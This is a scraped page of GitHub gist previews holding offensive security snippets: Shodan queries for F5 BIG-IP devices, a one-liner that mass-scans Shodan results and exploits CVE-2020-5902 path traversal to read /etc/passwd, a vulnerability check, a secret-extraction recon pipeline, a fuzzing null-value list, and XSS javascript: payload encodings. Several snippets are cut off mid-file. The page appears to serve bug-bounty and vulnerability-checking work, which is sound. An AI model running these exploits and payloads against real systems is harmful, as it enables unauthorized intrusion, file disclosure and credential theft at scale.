title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done | |
| #sudo apt install curl | |
| #sudo apt install python3-shodan | |
| #shodan init YOUR_API_KEY |
ykoster
/ cve-2020-5902-check.sh
Last active
July 8, 2020 10:02
Bash one-liner to check if a device is vulnerable for CVE-2020-5902
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' | \ | |
| grep -q Vulnerable && \ | |
| printf '\033[0;31mVulnerable\n' || \ | |
| printf '\033[0;32mNot Vulnerable\n' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # -*- coding: utf-8 -*- | |
| import requests | |
| import time | |
| import os | |
| import json | |
| import sys | |
| headers = { | |
| 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0', | |
| 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| undefined | |
| undef | |
| null | |
| NULL | |
| (null) | |
| nil | |
| NIL | |
| true | |
| false | |
| True |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "proxy":{ | |
| "ssl_pass_through":{ | |
| "automatically_add_entries_on_client_ssl_negotiation_failure":false, | |
| "rules":[ | |
| { | |
| "enabled":true, | |
| "host":".*\\.google\\.com", | |
| "protocol":"any" | |
| }, |
m4ll0k
/ gist:c33c3bac057584642c8a63144888e3d1
Created
June 22, 2020 13:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # replace $mytarget with your target | |
| gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli' | |
| # use -r option for extract anything | |
| gau $mytarget|egrep -iv '\.json'|grep -iE '\.js'|antiburl|awk '{print $4}' | xargs -I %% bash -c 'python3 SecretFinder.py -i %% -o cli -r "$anything"' |
securifera
/ Filename extension list
Created
June 21, 2020 00:31
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .php | |
| .html | |
| .txt | |
| .htm | |
| .aspx | |
| .asp | |
| .js | |
| .css | |
| .pgsql.txt | |
| .mysql.txt |
gh0sh
/ gf-and-gau-automate.sh
Last active
November 30, 2022 10:02
Simple script to look for juicy endpoints with gf and gau
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # | |
| # Requirements | |
| # - Golang (for complete bug bounty tools, clone this https://github.com/x1mdev/ReconPi) | |
| # - gau (go get -u github.com/lc/gau) | |
| # - gf (go get -u github.com/tomnomnom/gf) | |
| # - Gf-Patterns (https://github.com/1ndianl33t/Gf-Patterns) - Read the README.md for how to copy json file to ~/.gf/ | |
| cd ~/.gf | |
| ls *.json > ~/patterns |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!--javascript --> | |
| ja	vascript:alert(1) | |
| ja
vascript:alert(1) | |
| ja
vascript:alert(1) | |
| javascript:alert() | |
| <!--::colon:: --> | |
| javascript:alert() | |
| javascript:alert() | |
| javascript:alert(1) |